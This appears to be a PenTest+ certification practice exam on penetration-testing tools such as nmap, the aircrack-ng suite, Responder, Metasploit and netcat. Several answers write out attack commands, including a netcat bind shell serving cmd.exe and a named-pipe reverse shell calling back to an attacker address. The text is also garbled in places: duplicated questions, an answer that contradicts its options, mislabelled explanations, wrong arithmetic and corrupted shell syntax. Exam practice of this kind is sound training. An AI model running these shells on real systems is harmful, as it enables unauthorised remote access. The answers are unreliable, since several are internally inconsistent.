CompTIA PenTest+ Certification Practice Exam Chapter 4 (Total Sem Online Material)

Question 1

Which tool is used to craft packets for injection into a wireless network—for instance, after obtaining a, XOR file from a fragmentation or ChopChop attack against a WEP network.
A.aircrack-ng
B.airbase-ng
C.packetforge-ng
D.iwconfig

Answer 1

C.packetforge-ng

Explanation:
Packetforge-ng is used to craft ARP, UDP, ICMP, or other custom packets for injection into wireless networks. This is often used in conjunction with an XOR file obtained from a fragmentation or ChopChop attack to ultimately obtain a WEP key.

A, B, and D are incorrect. A is incorrect because aircrack-ng is a tool used to crack WEP and WPA-PSK keys; aircrack-ng also lends its name to a suite of tools used in penetration testing of wireless networks. B is incorrect because airbase-ng is a tool used to attack wireless clients rather than the APs to which they connect—for instance, by creating an evil twin AP to which a potential victim can connect. D is incorrect because iwconfig is a Linux utility used for configuration of wireless network interfaces.

Question 2

Which nmap flag is used to denote a simple ping scan?
A.-Pn
B.-sn
C.-v
D.-sL

Answer 2

B.-sn

Explanation:
The -sn nmap flag denotes a simple ping scan.

A, C, and D are incorrect. A is incorrect because the -Pn flag disables ping and skips host discovery. C is incorrect because the -v flag increases output verbosity. D is incorrect because the -sL flag is used when listing multiple targets to be scanned.

Question 3

Which nmap flag will redirect output to a file in the native, XML, and grep-friendly formats all at once?
A.-oN
B.-oG
C.-oX
D.-oA

Answer 3

D.-oA

Explanation:
The -oA flag will redirect nmap output to a file in the native, XML, and grep-friendly formats all at once.

A, B, and C are incorrect. A is incorrect because the -oN flag will only save scan results in the standard output format. B is incorrect because -oG will only save scan results in a grep-able format. C is incorrect because -oX will only save scan results in XML format.

Question 4

Developed by Rapid7, which commercially available vulnerability scanner features a web-based user interface and allows users to execute both credentialed and noncredentialed scans?
A.Nexpose
B.Nikto
C.W3AF
D.OpenVAS

Answer 4

A.Nexpose

Explanation:
Nexpose is developed by and available from Rapid7 and sports multiple features, such as remediation reports and integration with Metasploit Pro.

B, C, and D are incorrect. B is incorrect because Nikto is a command-line-only website and web application scanner developed by Chris Sullo and David Lodge. C is incorrect because W3AF (the Web Application Attack and Audit Framework) is an open-source, Python-based web application scanner developed by Andres Riancho and numerous contributors and sponsors. D is incorrect because OpenVAS is an open-source vulnerability scanner composed of several various services and tools, rather than strictly a website and web application scanner.

Question 5

Which of the following tools would be most appropriate when attempting to perform an LLMNR poisoning attack?
A.airodump-ng
B.Wireshark
C.tcpdump
D.Responder

Answer 5

D.Responder

Explanation:
Responder is a Python-based tool that simplifies the process of poisoning name resolution services. Responder is able to effectively target LLMNR, NBT-NS, and MDNS services.

A, B, and C are incorrect. A is incorrect because airodump-ng is a component of the aircrack-ng suite used to capture raw frames in 802.11 Wi-Fi networks. B is incorrect because Wireshark is a network protocol analyzer that sniffs out network traffic and displays the contents of packets going across a network. It is often used for general network troubleshooting or in software development but also has value in penetration testing, where it can be leveraged to verify network security implementations, or intercept plaintext communications. C is incorrect because tcpdump is another network protocol analyzer and is also used to troubleshoot networks, assist in software development, or for security purposes. Tcpdump is predominantly used as a command-line tool, although graphical interfaces for it exist.

Question 6

Which of the following are dictated by Nessus policies? (Choose two.)
A.Vulnerability information
B.Plugins in use
C.Configuration values
D.Remediation details

Answer 6

B.Plugins in use
C.Configuration values

Explanation:
Nessus policies dictate the plugins used for a scan and the associated configuration values.

A and D are incorrect. Vulnerability information and remediation details are components of the output of a Nessus scan, rather than facets defined before the scan takes place.

Question 7

Which command within the Metasploit Framework can integrate finished scan results from various automated tools to track targets, services, and other features of interest to a penetration tester?
A.workspace
B.services
C.db_import
D.db_nmap

Answer 7

C.db_import

Explanation:
db_import can be used to import output files from multiple automated scanners and other tools, integrating their data into the Metasploit Framework for tracking of hosts, IP addresses, discovered vulnerabilities, and identified account credentials.

A, B, and D are incorrect. None of these answers is used to integrate information into a Metasploit workspace from external sources. A is incorrect because the workspace command is used to create, destroy, switch, and list the available workspaces within the Metasploit Framework, which is helpful in keeping environment data separated between different penetration testing engagements. B is incorrect because the services command is used to add to, delete from, list, or search within the range of identified services running on hosts identified within a Metasploit Framework workspace. D is incorrect because the db_nmap command is used to execute an nmap scan from within the Metasploit Framework, which will automatically incorporate its results into the workspace, tracking any discovered hosts and services as appropriate. Note that this differs from the correct answer in that, while it is importing nmap scan results, the scan is being conducted live rather than simply importing existing nmap output files.`

Question 8

Which tool is a security auditing framework for Android that helps penetration testers identify and validate vulnerabilities discovered in applications? It consists of two components: an agent installed on a mobile device, and a console installed on a tester’s workstation.
A.Android Studio
B.Drozer
C.Xcode
D.ADB

Answer 8

B.Drozer

Explanation:
The tool described is Drozer; it is an excellent tool for DAST and has some value in reverse engineering of Android APK files.

A, C, and D are incorrect. A is incorrect because Android Studio is primarily used to develop and build packages for its target mobile environment, and it has some utility in static application analysis when provided with the project file used to create the installable application package. C is incorrect because Xcode is Apple’s development framework used to develop applications for iOS in Swift or Objective C on macOS. D is incorrect because the Android Debug Bridge (ADB) is a means for connecting to an Android device when one has physical access; ADB can be used for package installation and mobile system enumeration.

Question 9

Which open-source command-line-exclusive tool is a rather robust web server scanner that checks for potentially dangerous files, outdated software versions, and server configuration items?
A.Dirbuster
B.Burp Suite
C.nikto
D.BeEF

Answer 9

C.nikto

Explanation:
The tool described is nikto. In addition to the features listed in the question, nikto provides full SSL and HTTP proxy support, the ability to save scan output in multiple formats, and methods for host authentication for credentialed scanning. It should be noted that nikto is a very “noisy” scanner; it was designed to scan targets quickly and efficiently—stealth was not and is not a goal for its development.

A, B, and D are incorrect. A is incorrect because, while Dirbuster is a web server scanning tool that can be launched and interacted with via the command line, it is a Java application with a functional graphical interface. Since Dirbuster is not exclusive to the command line, only scans for hidden pages and subdirectories on a web server, and does not identify outdated software versions or configuration items as nikto does, this answer is incorrect. It should be further noted that Dirbuster is a deprecated tool; its functionality has been absorbed by the OWASP ZAP project as an add-on. B is incorrect because Burp Suite is a Java-based software tool for web vulnerability assessments that is capable of detecting numerous vulnerabilities, identifying attack insertion points, and other issues that degrade the security of a web application or web server. While Burp Suite can be run from the command line (in what is termed “headless mode”), it is not exclusive to the command line and is in fact most frequently used via its graphical interface, making this answer incorrect. D is incorrect because BeEF is a Ruby-based framework developed by The BeEF Project, designed to assist penetration tests by focusing on client-side attack vectors, rather than a web server scanner. While BeEF does have a command-line console available, it is commonly run from its graphical interface, much like Burp Suite. For these reasons, this answer is incorrect.

Question 10

Consider the following nmap output:

Nmap scan report for 10.1.2.3 
Host is up (0.00034s latency). 
Not shown: 389 closed ports 
PORT     STATE SERVICE 
22/tcp   open  ssh 
23/tcp   open  telnet 
25/tcp   open  smtp 
53/tcp   open  domain 
80/tcp   open  http 
111/tcp  open  rpcbind 
139/tcp  open  netbios-ssn 
445/tcp  open  microsoft-ds 
2049/tcp open  nfs 
5432/tcp open  postgresql 
5900/tcp open  vnc 

Read data files from: /usr/bin/../share/nmap 
# Nmap done at Sat May 12 08:18:18 2018 -- 1 IP address  
(1 host up) scanned in 0.05 seconds 

Assuming standard ports and options are in use, which of the following options would be a good flag to add for additional scans to further enumerate the service running on port 2049?
A.--script=nfs-*
B.--script=pgsql-brute
C.--script=http-enum
D.--script=telnet*

Answer 10

A.–script=nfs-*

Explanation:
In this case, –script=nfs-* would be most useful for further enumeration of port 2049, given standard ports. One helpful feature of nmap is its support for wildcard characters. In the sample listed here, –script=nfs-* would call all scripts with names beginning with nfs-. In this case, one would expect to see the scripts nfs-ls, nfs-showmount, and nfs-statfs loaded.

B, C, and D are incorrect. None of these options would affect port 2049 given the use of standard ports. B is incorrect because –script=pgsql-brute would be expected to run against port 5432, which is a standard port used for PostgreSQL. C is incorrect because –script=http-enum would be expected to run against port 80, the standard port for HTTP. D is incorrect because –script=telnet* would be expected to run against port 23, the standard port for telnet.

Question 11

Which command will establish a bound shell on a Windows host? Assume that the nc executable is in the present working directory, the attacking system IP address is 10.1.2.2, and the victim IP address is 10.1.4.4.
A.nc.exe -nv 10.1.2.2 4444 C:\Windows\System32\cmd.exe
B.nc.exe -nvlp 10.1.4.4 4444 cmd.exe
C.nc.exe -nvlp 4444 -e C:\Windows\System32\cmd.exe
D.nc.exe -nv 10.1.4.4 4444 -e C:\Windows\System32\cmd.exe

Answer 11

C.nc.exe -nvlp 4444 -e C:\Windows\System32\cmd.exe

Explanation:
A bound shell requires at a minimum the -l and -p flags to establish a listener and designate the listening port, respectively, a port number, then the -e flag and the command to execute through the netcat connection (in this case, Windows’ cmd.exe).

A, B, and D are incorrect. A is incorrect because it is attempting to establish a reverse shell, as there is no -l or -p flag present to indicate that a listener is being established on the local host. In addition, this command would attempt to connect to a port on the Windows system itself, which would likely fail as there would not likely be any service listening on port 4444. This answer is also missing the -e flag, which is necessary before declaring the command to be executed across the netcat connection. B is incorrect because it attempts to establish a listener on the attacking system; this would be met with an error because the IP address 10.1.4.4 would not be available on the victim Windows host to bind a port. In addition, there is no -e flag before the cmd.exe call, which would produce a syntax error. D is incorrect because the command listed would provide a reverse shell to an established netcat listener on the attacking system at port 4444; as stated previously, bound shells require the -l and -p flags in addition to the -e flag.

Question 12

Which freely available, open-source web application scanning tool provides automated vulnerability scanning, traffic interception, and HTTP parameter tampering in addition to a robust RESTful API?
A.OWASP ZAP
B.nikto
C.Nexpose
D.Qualys WAS

Answer 12

A.OWASP ZAP

Explanation:
OWASP ZAP is a free, open-source web application and web server scanning tool. It boasts numerous features similar to those found in Burp Suite, including automated scanning, site fuzzing, and a marketplace for add-ons and plugins.

A, B, and C are incorrect. A is incorrect because nikto is an open-source, command-line-based web server scanner that checks for potentially dangerous files, outdated software versions, and server configuration items. It can perform neither traffic interception nor HTTP parameter tampering, nor does it provide an API, making this answer incorrect. B is incorrect because Rapid7’s Nexpose is a broad-scale, commercial vulnerability scanner. Since Nexpose is a commercial, proprietary product that is not limited to web server scanning and is incapable of traffic interception, this answer is incorrect. C is incorrect because Qualys WAS (Web Application Scanner) is a commercial, cloud-based web application scanning and vulnerability discovery service. As Qualys WAS is also a commercial, proprietary product, this answer is also incorrect.

Question 13

Which tool is used for association with wireless networks and packet injection?
A.airmon-ng
B.bluesnarfer
C.aireplay-ng
D.reaver

Answer 13

C.aireplay-ng

Explanation:
Aireplay-ng is a component of the aircrack-ng suite, and enables users to inject packets into wireless networks.

A, B, and D are incorrect. A is incorrect because airmon-ng is a script used to set wireless network cards to monitor mode. B is incorrect because bluesnarfer is used for bluesnarfing attacks, which steal phonebooks and other information from Bluetooth-enabled devices. D is incorrect because reaver is a tool used for attacks against WPS-enabled networks.

Question 14

Which Python-based tool allows users to craft packets and decode data with extreme precision, and is often used itself to create more refined tools?
A.scapy
B.Responder
C.hping3
D.BeEF

Answer 14

A.scapy

Explanation:
Scapy is an interactive, Python-based packet manipulation program that is able to forge and decode packets for a wide range of protocols. Its versatility enables users to handcraft packets with relative ease, enabling tool development or quicker testing efforts where other tools are not quite able to meet the tester’s needs.

B, C, and D are incorrect. B is incorrect because, although Responder is a Python-based tool, it enables users to poison name resolution services rather than design, craft, send, and decode packets. C is incorrect because, while hping3 is a command-line TCP/IP packet analyzer and assembler, it is written in C and lacks much of the functionality and granularity found in scapy. D is incorrect because BeEF is a Ruby-based framework developed by The BeEF Project designed to assist penetration tests by focusing on client-side attack vectors.

Question 15

Which tool is used heavily in web server and web application testing, providing numerous features such as automated vulnerability detection, native traffic proxying and interception, automated site content discovery, on-the-fly parameter tampering, and robust plugin support for additional modules to expand functionality or target-specific classes of vulnerability?
A.gobuster
B.Burp Suite
C.Nessus
D.Hydra

Answer 15

B.Burp Suite

Explanation:
The tool described is PortSwigger’s Burp Suite. The key indicator here is the ability to intercept HTTP and HTTPS traffic on the fly and modify it for the purposes of testing.

A, C, and D are incorrect. A is incorrect because gobuster is a go-based, command-line-exclusive tool designed to brute-force uniform resource indicators (URIs) and DNS subdomains. It is incapable of any of the other features listed in the question, making this answer incorrect. C is incorrect because Nessus is a web-based vulnerability scanner that detects and alerts on potential vulnerabilities on target systems; it does not exclusively target web servers and web applications, nor is it capable of traffic interception or modification, making this answer incorrect. D is incorrect because Hydra is a parallelized login brute-force tool that can attack numerous protocols, including HTTP and HTTPS, LDAP, MySQL, and SSH, among many others. It does not provide any automated vulnerability scanning features, nor is it capable of content discovery, traffic interception, or parameter tampering, making this answer incorrect as well.

Question 16

Which of the following commands would silently (that is, without terminal output) create a simple text file with a list of IP addresses on a given subnet that responded to ICMP requests? Assume that you are attempting to identify systems on the 10.2.22.X subnet.
A.for i in 1..254; do ping -c 2 10.2.22.$i 2&>1 >/dev/null && echo 10.2.22.$i&raquo_space; hosts.txt; done
B.for i in 10.2.22.{1..254}; do ping -c 2 $i 2&>1 >/dev/null || echo $i&raquo_space; hosts.txt; done
C.for i in 10.2.22.{1..254}; do ping -c 2 $i 2>&1 >/dev/null && echo $i&raquo_space; hosts.txt; done
D.for i in 10.2.22.{1..254}; do ping -c 2 $i && echo $i > hosts.txt; done

Answer 16

C.for i in 10.2.22.{1..254}; do ping -c 2 $i 2>&1 >/dev/null && echo $i&raquo_space; hosts.txt; done

Explanation:
The for loop performs a two-packet-long ping of a host, redirecting all output to /dev/null. If the ping command is successful, the IP address is added to a file named hosts.txt; this command sequence is performed for all IP addresses in the 10.2.22.0/24 subnet. Note that this command cannot guarantee that systems that do not respond are not available; it is fairly common to see firewalls configured to discard ICMP requests, meaning these ping attempts would fail.

A, B, and D are incorrect. A is incorrect because the for loop component is not built properly; this “loop” would run once as written against the IP address 10.2.22.1..254 before failing out. B is incorrect because the use of the || operator would see a text file created that only tracks hosts that are unavailable to ICMP requests, restricting its usefulness to little beyond telling a reader which systems are available via the process of elimination. D is incorrect because the command sequence here is missing the 2>&1 >/dev/null output redirection, meaning it would constantly display statuses on a terminal window, failing in the stated objective of being silent during operation.

Question 17

What is the typical goal of LLMNR or NBT-NS poisoning attacks?
A.Interception of traffic data
B.Disruption of LLMNR services
C.Destruction of existing LLMNR records
D.Password collection

Answer 17

D.Password collection

Explanation:
LLMNR is a multicast, local network only, name resolution service that queries all hosts on a given local link for a particular host as well as accepts the first response it receives as an authoritative source. If the victim is attempting to access a resource that requires authentication, it will then send an NTLM hash to the attacking system, which can then be cracked offline to harvest passwords.

A, B, and C are incorrect. A is incorrect because the key target is the victim’s username and password, rather than the traffic they intended to send. B is incorrect because disruption of LLMNR would require an attack on the entire network, as it is a protocol that communicates via multicast (that is, by sending requests to all hosts on a given network). C is incorrect because LLMNR by its nature does not have records in the traditional sense; instead, it relies on the assumption that all servers identify themselves honestly and accurately. This inherent trust makes LLMNR vulnerable to exploitation by simply claiming to be the system or resource the victim is attempting to access.

Question 18

Consider the following nmap output:

Ports scanned: TCP(10;21-23,25,80,110,139,443,445,3389) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.1.2.3 () Status: Up
Host: 10.1.2.3 () Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 23/open/tcp//telnet///, 25/open/tcp//smtp///, 80/open/tcp//http///,
110/closed/tcp//pop3///, 139/open/tcp//netbios-ssn///,
443/closed/tcp//https///, 445/open/tcp//microsoft-ds///,
3389/closed/tcp//ms-wbt-server/// OS: Linux 2.6.9 - 2.6.33
Seq Index: 198 IP ID Seq: All zeros
# Nmap done at Sat May 12 09:41:47 2018 – 1 IP address (1 host up) scanned in 14.49 seconds

Based on the scan output, which of the following scan flags was most likely run?
A.-sS
B.-sY
C.-sU
D.-sC

Answer 18

A.-sS

Explanation:
A is correct. This scan would have been collected with a TCP SYN scan (sometimes called a stealth scan), given the options present. The first line of the sample shows how many ports were scanned and which type of scan was used for them. In this case, 10 ports were scanned with TCP, 0 with UDP, and 0 with SCTP. With that information, we can determine that -sS is the correct answer.

B, C, and D are incorrect. B and C are incorrect because although the -sY and -sU flags modify the type of scan being conducted, the output makes clear that neither an SCTP scan nor a UDP scan was conducted here. D is incorrect because we see no NSE data embedded in the output, which means -sC could not have been invoked in this scan.
`

Question 19

Which freely available, open-source web application scanning tool provides automated vulnerability scanning, traffic interception, and HTTP parameter tampering in addition to a robust RESTful API?
A.OWASP ZAP
B.nikto
C.Nexpose
D.Qualys WAS

Answer 19

A.OWASP ZAP

Explanation:
A.OWASP ZAP

Question 20

During a penetration test, you have obtained low privilege command execution via web application command injection on a target system where the installed version of netcat does not support the -e option. You elect to establish a reverse shell using a named pipe. The target IP address is 10.1.2.6, your attacking IP address is 10.1.2.2, and you have established a netcat listener with the command nc -nvlp 4444. Select the answer that will complete the command sequence to obtain a reverse shell callback.

A.mknod /tmp/fifo p; /bin/sh -c “/bin/sh 0/tmp/fifo
B.nc 10.1.2.2 4444 2>/tmp/fifo
C.1>/tmp/fifo > nc 10.1.2.2 4444
D.nc 10.1.2.6 4444 1>/tmp/fifo

Answer 20

A.nc 10.1.2.2 4444 1>/tmp/fifo

Explanation:
It takes the standard output (STDOUT, file descriptor 1) of the netcat connection (that is, commands sent by the attacker, since this is on the target system) and feeds it back into the named pipe, completing the reverse shell.

B, C, and D are incorrect. B is incorrect because it would feed the STDERR output of the netcat instance to the named pipe, resulting in nothing being fed to the /bin/sh instance unless there was an error in the netcat command (which would immediately close with a nonzero exit code). C is incorrect for a number of reasons: The STDOUT redirect is at the beginning of the line, which would place it directly after the named pipe. This is incorrect because the output redirect needs to go from the netcat connection to the named pipe. In addition, this configuration would dump the contents of /tmp/fifo to a file named “nc” in the current working directory, then fail when attempting to execute a command named “10.1.2.2”. D is incorrect because it attempts to establish an nc connection to the victim node—that is, the victim is attempting to call itself rather than the attacking system. Since there would be no callback, there would be no reverse shell, making this answer incorrect.

Question 21

Consider the following nmap output:

Ports scanned: TCP(10;21-23,25,80,110,139,443,445,3389) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.1.2.3 () Status: Up
Host: 10.1.2.3 () Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 23/open/tcp//telnet///, 25/open/tcp//smtp///, 80/open/tcp//http///,
110/closed/tcp//pop3///, 139/open/tcp//netbios-ssn///,
443/closed/tcp//https///, 445/open/tcp//microsoft-ds///,
3389/closed/tcp//ms-wbt-server/// OS: Linux 2.6.9 - 2.6.33
Seq Index: 198 IP ID Seq: All zeros
# Nmap done at Sat May 12 09:41:47 2018 – 1 IP address (1 host up) scanned in 14.49 seconds

Of the given options, which nmap flag could produce output in the format shown?
A.-oN
B.-oG
C.-sU
D.-sV

Answer 21

B.-oG

Explanation:
The sample is in nmap’s grep-able output format, which means the flag used to generate this output is -oG.

A, C, and D are incorrect. A is incorrect because although the -oN flag produces an output file, it produces a file in the standard nmap output format. C and D are incorrect because these options control elements of the scan to be run; the -sU flag tells nmap to scan UDP ports whereas the -sV flag is used to trigger service identification during the scan.

Question 22

Which command will establish a bound shell on a Windows host? Assume that the nc executable is in the present working directory, the attacking system IP address is 10.1.2.2, and the victim IP address is 10.1.4.4.
A.nc.exe -nv 10.1.2.2 4444 C:\Windows\System32\cmd.exe
B.nc.exe -nvlp 10.1.4.4 4444 cmd.exe
C.nc.exe -nvlp 4444 -e C:\Windows\System32\cmd.exe
D.nc.exe -nv 10.1.4.4 4444 -e C:\Windows\System32\cmd.exe

Answer 22

C.nc.exe -nvlp 4444 -e C:\Windows\System32\cmd.exe

Explanation:
A bound shell requires at a minimum the -l and -p flags to establish a listener and designate the listening port, respectively, a port number, then the -e flag and the command to execute through the netcat connection (in this case, Windows’ cmd.exe).

A, B, and D are incorrect. A is incorrect because it is attempting to establish a reverse shell, as there is no -l or -p flag present to indicate that a listener is being established on the local host. In addition, this command would attempt to connect to a port on the Windows system itself, which would likely fail as there would not likely be any service listening on port 4444. This answer is also missing the -e flag, which is necessary before declaring the command to be executed across the netcat connection. B is incorrect because it attempts to establish a listener on the attacking system; this would be met with an error because the IP address 10.1.4.4 would not be available on the victim Windows host to bind a port. In addition, there is no -e flag before the cmd.exe call, which would produce a syntax error. D is incorrect because the command listed would provide a reverse shell to an established netcat listener on the attacking system at port 4444; as stated previously, bound shells require the -l and -p flags in addition to the -e flag.

Question 23

Consider the following nmap output:

Nmap scan report for 10.1.2.3 
Host is up (0.00034s latency). 
Not shown: 389 closed ports 
PORT     STATE SERVICE 
22/tcp   open  ssh 
23/tcp   open  telnet 
25/tcp   open  smtp 
53/tcp   open  domain 
80/tcp   open  http 
111/tcp  open  rpcbind 
139/tcp  open  netbios-ssn 
445/tcp  open  microsoft-ds 
2049/tcp open  nfs 
5432/tcp open  postgresql 
5900/tcp open  vnc 

Read data files from: /usr/bin/../share/nmap 
# Nmap done at Sat May 12 08:18:18 2018 -- 1 IP address  
(1 host up) scanned in 0.05 seconds 

Based on this output, which of the following would have been a declared flag for this scan?
A.--top-ports=11
B.-sV
C.-sU
D.--top-ports=400

Answer 23

D.–top-ports=400

Explanation:
The correct answer is –top-ports=400. The clue here is in the total count of ports listed as scanned; 11 open ports shown plus 389 closed ports not shown would mean that only 200 ports were probed in this scan.

A, B, and C are incorrect. A is incorrect because –top-ports=11 would only account for the 11 open ports, and not the additional 389 ports that were scanned but found to not be open. B is incorrect because the -sV flag is used to perform service identification in an nmap scan. C is incorrect because the -sU flag is used to trigger UDP scanning of the target in question.

Question 24

For which of the following services is Ettercap not able to sniff usernames and passwords without performing a man-in-the-middle attack on SSL or another data encryption method?
A.SSH2
B.FTP
C.HTTP
D.LDAP

Answer 24

A.SSH2

Explanation:
Ettercap is able to sniff usernames and passwords for SSH1, but not for SSH2.

B, C, and D are incorrect. Passwords for FTP, HTTP, and LDAP can all be sniffed out by Ettercap out of the box, but be careful here: note that these choices specifically address versions of these services that are not secured via SSL (that is, HTTPS and LDAPS) or tunneled through an SSH connection (that is, SFTP). Such distinctions can seem trivial, but a single letter is all it takes to make an answer incorrect. Read each question and answer carefully during the exam to avoid these potential snags.